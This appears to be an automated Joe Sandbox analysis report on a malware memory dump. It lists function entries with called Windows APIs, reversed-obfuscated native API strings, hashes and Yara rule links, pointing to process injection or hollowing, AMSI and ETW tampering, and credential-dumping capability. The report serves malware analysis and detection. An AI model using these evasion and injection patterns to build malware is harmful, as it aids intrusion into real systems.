Instruction ID: 4e32b6215ae3ebd59f6d618e7efd7fd3752c90ad440fb092ebf4fa7a4a017a94
Opcode Fuzzy Hash: a9bfea9a5d7fe6a81bc5bda29f6d3b882b9734483e7e7903342be88335b478b2
Instruction Fuzzy Hash: 1921FF75A50308BAEB21EAE4CC46FDEB7BDEF44B00F514161B600F71C0DBB0AE048A65

Function 029479AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02948018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948088,?,?,00000000,?,029479FE,ntdll,00000000,00000000,02947A43,?,?,00000000), ref: 02948056
Part of subcall function 02948018: GetModuleHandleA.KERNELBASE(?), ref: 0294806A

Part of subcall function 029480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948148,?,?,00000000,00000000,?,02948061,00000000,KernelBASE,00000000,00000000,02948088), ref: 0294810D
Part of subcall function 029480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02948113
Part of subcall function 029480C0: GetProcAddress.KERNEL32(?,?), ref: 02948125

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02947A1F

Strings

ntdll, xrefs: 029479F4
yromeMlautriVetacollAwZ, xrefs: 029479C7

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: 97eb1bf1c1ea0f9074d10f259f4bf7f347348ac8cb1df05e3cfb4c422346c2d2
Instruction ID: fe42579190d12e91ae942183e4d7a43af6660398eee66fb7d11e2faa1239668b
Opcode Fuzzy Hash: 97eb1bf1c1ea0f9074d10f259f4bf7f347348ac8cb1df05e3cfb4c422346c2d2
Instruction Fuzzy Hash: C6112175644208BFEB11EFA4DC41EEEB7EDEB8D710F514461F904D7640DA30EA148B60

Function 029479AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02948018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948088,?,?,00000000,?,029479FE,ntdll,00000000,00000000,02947A43,?,?,00000000), ref: 02948056
Part of subcall function 02948018: GetModuleHandleA.KERNELBASE(?), ref: 0294806A

Part of subcall function 029480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948148,?,?,00000000,00000000,?,02948061,00000000,KernelBASE,00000000,00000000,02948088), ref: 0294810D
Part of subcall function 029480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02948113
Part of subcall function 029480C0: GetProcAddress.KERNEL32(?,?), ref: 02948125

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02947A1F

Strings

ntdll, xrefs: 029479F4
yromeMlautriVetacollAwZ, xrefs: 029479C7

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: 6ea80e50171e0b5fcd7d406c5b43f3687c36a0ebeced75883332b71d5d77cd04
Instruction ID: 9a1ec8aafca007ae069c7bd3b69ecd95c2e9f0e68d720ce55552c342b7038035
Opcode Fuzzy Hash: 6ea80e50171e0b5fcd7d406c5b43f3687c36a0ebeced75883332b71d5d77cd04
Instruction Fuzzy Hash: E0112D75A44208BFEB11EFA4DC41EEEB7EEEB8DB10F514861F904D7640DA30AA148B60

Function 0294824C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02948018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948088,?,?,00000000,?,029479FE,ntdll,00000000,00000000,02947A43,?,?,00000000), ref: 02948056
Part of subcall function 02948018: GetModuleHandleA.KERNELBASE(?), ref: 0294806A

Part of subcall function 029480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948148,?,?,00000000,00000000,?,02948061,00000000,KernelBASE,00000000,00000000,02948088), ref: 0294810D
Part of subcall function 029480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02948113
Part of subcall function 029480C0: GetProcAddress.KERNEL32(?,?), ref: 02948125

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029482BD

Strings

ntdll, xrefs: 02948294
yromeMlautriVdaeRtN, xrefs: 02948267

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 2521977463-737317276
Opcode ID: b8396e82d21401724e78882076c031dd511c21f6e2b289a860a3bd2114b578e6
Instruction ID: 6b599015029ced5e9b35a453697c16f5c8d5fba50d5ef304c1acac8cfb333ceb
Opcode Fuzzy Hash: b8396e82d21401724e78882076c031dd511c21f6e2b289a860a3bd2114b578e6
Instruction Fuzzy Hash: 9A014075A04208BFEB01EFA8DC41EAE77EEFB8DB14F514860F904D7640DA30AD118B64

Function 02947CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02948018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948088,?,?,00000000,?,029479FE,ntdll,00000000,00000000,02947A43,?,?,00000000), ref: 02948056
Part of subcall function 02948018: GetModuleHandleA.KERNELBASE(?), ref: 0294806A

Part of subcall function 029480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948148,?,?,00000000,00000000,?,02948061,00000000,KernelBASE,00000000,00000000,02948088), ref: 0294810D
Part of subcall function 029480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02948113
Part of subcall function 029480C0: GetProcAddress.KERNEL32(?,?), ref: 02948125

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02947D6C

Strings

yromeMlautriVetirW, xrefs: 02947D13
Ntdll, xrefs: 02947D43

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 2719805696-3542721025
Opcode ID: d3ef27b7a37fdc7d3c703c66c8f0b5e86be40b7d9459282d59ab62beeca5ab3e
Instruction ID: a334c1a9c6a974b68dcb7694618df1bfa3f88dc2cddc4409e883d68147390ad5
Opcode Fuzzy Hash: d3ef27b7a37fdc7d3c703c66c8f0b5e86be40b7d9459282d59ab62beeca5ab3e
Instruction Fuzzy Hash: 6B010075A54208BFEB01EFA8DC51EEEB7EDEF8D710F514860F904D7680DA30A9108B60

Function 029484BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02948018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948088,?,?,00000000,?,029479FE,ntdll,00000000,00000000,02947A43,?,?,00000000), ref: 02948056
Part of subcall function 02948018: GetModuleHandleA.KERNELBASE(?), ref: 0294806A

Part of subcall function 029480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948148,?,?,00000000,00000000,?,02948061,00000000,KernelBASE,00000000,00000000,02948088), ref: 0294810D
Part of subcall function 029480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02948113
Part of subcall function 029480C0: GetProcAddress.KERNEL32(?,?), ref: 02948125

NtUnmapViewOfSection.NTDLL(?,?), ref: 02948521

Strings

noitceSfOweiVpamnUtN, xrefs: 029484D7
ntdll, xrefs: 02948504

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: HandleModule$AddressProc$SectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 3503870465-2520021413
Opcode ID: 69cd1bcf40d0c3caa20385fef01a0d441b4eb7babe7cc91e318b35793287c3a4
Instruction ID: ef1bab3f8794d78c1676c4c74a83edf7859fa22c2bdc035f12c46d228acd00f0
Opcode Fuzzy Hash: 69cd1bcf40d0c3caa20385fef01a0d441b4eb7babe7cc91e318b35793287c3a4
Instruction Fuzzy Hash: FC016774A54204BFEB11EFA4DC52E9E77EEFBC9B10F524860F40097640DE30A9008A50

Function 0294DE24 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL(?,?), ref: 0294DEA0
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0294DEF2), ref: 0294DEB6
NtDeleteFile.NTDLL(?), ref: 0294DED5

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: Path$DeleteFileInitNameName_StringUnicode
String ID:
API String ID: 1459852867-0
Opcode ID: 81a3fcad245d26d436ee080414de88a1276072e757c7c99f4d851eda74b2816d
Instruction ID: 8893c7103f38e2614d4139959f8fc7f195c2b939bab0fd5342680469a8d8e5e8
Opcode Fuzzy Hash: 81a3fcad245d26d436ee080414de88a1276072e757c7c99f4d851eda74b2816d
Instruction Fuzzy Hash: A901867AA443486EEB05EBA0CD81FCF77BDAF95704F5104E29200E6091DE74AB098B31

Function 0294DE78 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02934ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02934EDA

RtlInitUnicodeString.NTDLL(?,?), ref: 0294DEA0
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0294DEF2), ref: 0294DEB6
NtDeleteFile.NTDLL(?), ref: 0294DED5

Part of subcall function 02934C0C: SysFreeString.OLEAUT32(0294ED84), ref: 02934C1A

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
String ID:
API String ID: 1694942484-0
Opcode ID: 162f67218028e6c64f6fb4ee5ec00c58014db4b7c107057784b69a35e316262e
Instruction ID: dd63e9c335072f3c43ad21c5f7bd062c4918a3291c4ae5d8721c82c54d033568
Opcode Fuzzy Hash: 162f67218028e6c64f6fb4ee5ec00c58014db4b7c107057784b69a35e316262e
Instruction Fuzzy Hash: 2901E175A40208BADB15EAE0CD51FDFB3BDDB98700F5144A1A604E2580EA74AB048A74

Function 02946D48 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 02946CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02946D39,?,?,?,00000000), ref: 02946D19

CoCreateInstance.OLE32(?,00000000,00000005,02946E2C,00000000,00000000,02946DAB,?,00000000,02946E1B), ref: 02946D97

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: ed026ec6e64f8c8d4753efbf33dea41041746272eaf4353d55554d8310fdc6e1
Instruction ID: 806ea9d1628e59a5d269d06f6115e893e44deb53ff0a3578004acbddd72bb8b0
Opcode Fuzzy Hash: ed026ec6e64f8c8d4753efbf33dea41041746272eaf4353d55554d8310fdc6e1
Instruction Fuzzy Hash: D501F2B1208704AEE716DF64DC62C6BBBEDEB8AB10B520835F501E2680EA309910C861

Function 02957CAC Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0294881C: LoadLibraryA.KERNEL32(00000000,00000000,02948903), ref: 02948850
Part of subcall function 0294881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02948903), ref: 02948860
Part of subcall function 0294881C: GetProcAddress.KERNEL32(74B20000,00000000), ref: 02948879
Part of subcall function 0294881C: FreeLibrary.KERNEL32(74B20000,00000000,02992388,Function_000065D8,00000004,02992398,02992388,000186A3,00000040,0299239C,74B20000,00000000,00000000,00000000,00000000,02948903), ref: 029488E3

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02A867DC,02A86820,OpenSession,0299237C,0295B40C,UacScan,0299237C), ref: 0295826D
ResumeThread.KERNEL32(00000000,ScanBuffer,0299237C,0295B40C,OpenSession,0299237C,0295B40C,UacScan,0299237C,0295B40C,ScanBuffer,0299237C,0295B40C,OpenSession,0299237C,0295B40C), ref: 029588B7
CloseHandle.KERNEL32(00000000,ScanBuffer,0299237C,0295B40C,OpenSession,0299237C,0295B40C,UacScan,0299237C,0295B40C,00000000,ScanBuffer,0299237C,0295B40C,OpenSession,0299237C), ref: 02958A36

Part of subcall function 02948798: LoadLibraryW.KERNEL32(bcrypt,?,00000600,00000000,029923A4,0294A3BF,ScanString,029923A4,0294A774,ScanBuffer,029923A4,0294A774,Initialize,029923A4,0294A774,UacScan), ref: 029487AC
Part of subcall function 02948798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029487C6
Part of subcall function 02948798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000600,00000000,029923A4,0294A3BF,ScanString,029923A4,0294A774,ScanBuffer,029923A4,0294A774,Initialize), ref: 02948802

CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,0299237C,0295B40C,UacInitialize,0299237C,0295B40C,ScanBuffer,0299237C,0295B40C,OpenSession,0299237C,0295B40C,UacScan,0299237C), ref: 02958E28

Part of subcall function 02937E10: GetFileAttributesA.KERNEL32(00000000,?,0294FD00,ScanString,0299237C,0295B40C,OpenSession,0299237C,0295B40C,ScanString,0299237C,0295B40C,UacScan,0299237C,0295B40C,UacInitialize), ref: 02937E1B

Part of subcall function 0294DF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0294DFD2), ref: 0294DF3F
Part of subcall function 0294DF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0294DF79
Part of subcall function 0294DF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0294DFA6
Part of subcall function 0294DF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0294DFAF

Part of subcall function 02948184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0294820E), ref: 029481F0

ExitProcess.KERNEL32(00000000,OpenSession,0299237C,0295B40C,ScanBuffer,0299237C,0295B40C,Initialize,0299237C,0295B40C,00000000,00000000,00000000,ScanString,0299237C,0295B40C), ref: 0295AE59

Strings

DlpGetWebSiteAccess, xrefs: 0295A045
NtAccessCheck, xrefs: 0295AB75
DllGetClassObject, xrefs: 02959C74, 0295A944
psapi, xrefs: 0295A552
NtQuerySystemInformation, xrefs: 0295A4D5
SLGetEncryptedPIDEx, xrefs: 0295A9AA
NtQueryVirtualMemory, xrefs: 0295AA10
EtwEventWrite, xrefs: 0295ACA7
mssip32, xrefs: 02959CF1
spp, xrefs: 02959C58, 02959C8B, 0295A928
UacInitialize, xrefs: 02958CB3, 029590CF
NtWaitForSingleObject, xrefs: 0295A1D6
ntdll, xrefs: 02958DAF, 02958DFF, 02958E13, 0295A187, 0295A1BA, 0295A1ED, 0295A220, 0295A253, 0295A9F4, 0295AA27, 0295AA5A, 0295AA8D, 0295AAC0, 0295AAF3, 0295AB26, 0295AB59, 0295AB8C, 0295ABBF, 0295ABF2, 0295AC25, 0295AC58, 0295AC8B, 0295ACBE
DlpNotifyPreDragDrop, xrefs: 02959FAC
RtlCreateQueryDebugBuffer, xrefs: 0295A23C
EnumServicesStatusExA, xrefs: 0295A52F
VirtualProtect, xrefs: 0295A69E
EtwEventWriteEx, xrefs: 0295AC74
SLGetGenuineInformation, xrefs: 029599CE
Initialize, xrefs: 02957D34, 02957F24, 02958F31, 02959B1C, 02959EBA, 0295A3E9, 0295A7A3, 0295ACEF
CreateProcessAsUserW, xrefs: 0295A589, 0295A5A7
advapi32, xrefs: 02958DC3
bcrypt, xrefs: 02959E1C
NtOpenProcess, xrefs: 02958E0E
NtOpenObjectAuditAlarm, xrefs: 02958DAA
endpointdlp, xrefs: 02959FC3, 02959FF6, 0295A029, 0295A05C
tquery, xrefs: 02959C25
NtQueryInformationThread, xrefs: 0295AA43
RetailTracerEnable, xrefs: 02959C0E
GetProcessMemoryInfo, xrefs: 02959CA7
NtAlertResumeThread, xrefs: 0295A170
CreateProcessW, xrefs: 0295A56B
CreateProcessA, xrefs: 0295A55C
LdrLoadDll, xrefs: 0295ABA8
DlpCheckIsCloudSyncApp, xrefs: 02959FDF
NtWriteVirtualMemory, xrefs: 0295AC0E
CryptSIPVerifyIndirectData, xrefs: 02959CDA
NtGetWriteWatch, xrefs: 0295A9DD
SLGetSLIDList, xrefs: 02959A01
BCryptVerifySignature, xrefs: 02959E05
CreateProcessAsUserA, xrefs: 0295A57A
sppwmi, xrefs: 0295A95B
NtOpenSection, xrefs: 0295AA76
MiniDumpWriteDump, xrefs: 02958DD2
NtMapViewOfSection, xrefs: 0295AADC
NtSetSecurityObject, xrefs: 02958DFA
SetUnhandledExceptionFilter, xrefs: 0295A76A
VirtualAllocEx, xrefs: 0295A66B
sppc, xrefs: 029599E5, 02959A18, 02959A4B, 02959A7E, 0295A98E, 0295A9C1
RtlAllocateHeap, xrefs: 0295A1A3, 0295A209
DlpGetArchiveFileTraceInfo, xrefs: 0295A012
LdrGetProcedureAddress, xrefs: 0295ABDB
EnumServicesStatusW, xrefs: 0295A520
EnumServicesStatusA, xrefs: 0295A511
WriteVirtualMemory, xrefs: 0295A704
FlushInstructionCache, xrefs: 0295A737
SxTracerGetThreadContextDebug, xrefs: 02959C41, 0295A911
VirtualAlloc, xrefs: 0295A638
dbgcore, xrefs: 02958DD7, 02958DEB
NtQuerySecurityObject, xrefs: 0295AB42
ScanString, xrefs: 02957DB0, 0295801C, 02958AC3, 02958EB5, 0295929E, 0295965A, 02959958, 02959D13, 0295A0FA, 0295A2F1, 0295A89B
Kernel32, xrefs: 0295A561, 0295A570, 0295A5AC
MiniDumpReadDumpStream, xrefs: 02958DE6
UacScan, xrefs: 02957FA0, 02958129, 02958282, 02958428, 029585B5, 02958749, 029588C8, 02958B3F, 02958FAD, 029591C7, 029593A8, 0295951C, 02959752, 0295A5C2
NtOpenFile, xrefs: 0295AC41
RtlQueryProcessDebugInformation, xrefs: 0295A502
NtReadVirtualMemory, xrefs: 0295AB0F
NtQueryDirectoryFile, xrefs: 0295A4F3
NtDeviceIoControlFile, xrefs: 0295A4E4
C:\Windows\System32\, xrefs: 02958237
SLGatherMigrationBlob, xrefs: 0295A977
kernel32, xrefs: 0295A64F, 0295A682, 0295A6B5, 0295A6E8, 0295A71B, 0295A74E, 0295A781
EnumProcessModules, xrefs: 0295A54D
EnumServicesStatusExW, xrefs: 0295A53E
I_QueryTagInformation, xrefs: 02958DBE
psapi, xrefs: 02959CBE
Advapi, xrefs: 0295A516, 0295A525, 0295A534, 0295A543, 0295A57F, 0295A58E, 0295A59D
SLLoadApplicationPolicies, xrefs: 02959A67
ScanBuffer, xrefs: 029580AD, 0295837A, 02958520, 029586AD, 02958841, 029589C0, 02958C37, 02958D2F, 0295914B, 02959424, 02959598, 029597CE, 02959860, 02959B98, 02959F36, 0295A465, 0295AD6B
Ntdll, xrefs: 0295A4DA, 0295A4E9, 0295A4F8, 0295A507
OpenSession, xrefs: 02957CB8, 02957E2C, 02957EA8, 029581A5, 029582FE, 029584A4, 02958631, 029587C5, 02958944, 02958A47, 02958BBB, 02958E39, 02959029, 0295931A, 029594A0, 029596D6, 029598DC, 02959AA0, 02959D8F, 02959E3E, 0295A07E, 0295A275, 0295A36D, 0295A81F, 0295ADE7
OpenProcess, xrefs: 0295A6D1
SLIsGenuineLocalEx, xrefs: 02959A34
CreateProcessWithLogonW, xrefs: 0295A598
NtCreateSection, xrefs: 0295AAA9

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 2481178504-1225450241
Opcode ID: 10f6edec43270d4d9765a48941c613f3c01ab43e667b359a2777e78d123dc1a7
Instruction ID: 0a80e1030af6b429cea4833a35e05bb9d9d25f3f3f4c0e906e764063ecba6cf1
Opcode Fuzzy Hash: 10f6edec43270d4d9765a48941c613f3c01ab43e667b359a2777e78d123dc1a7
Instruction Fuzzy Hash: 1343F775B101289BDB22EB64DD90DEE73FABFD4304F1550E5E409AB358DA30AE828F51

Function 02931724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,02932000), ref: 029317D0
Sleep.KERNEL32(0000000A,00000000,?,02932000), ref: 029317E6

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a7ece11de91c4ab0446c1ade9a8ad27dbe264446960c68d1d4fae13a8e03b693
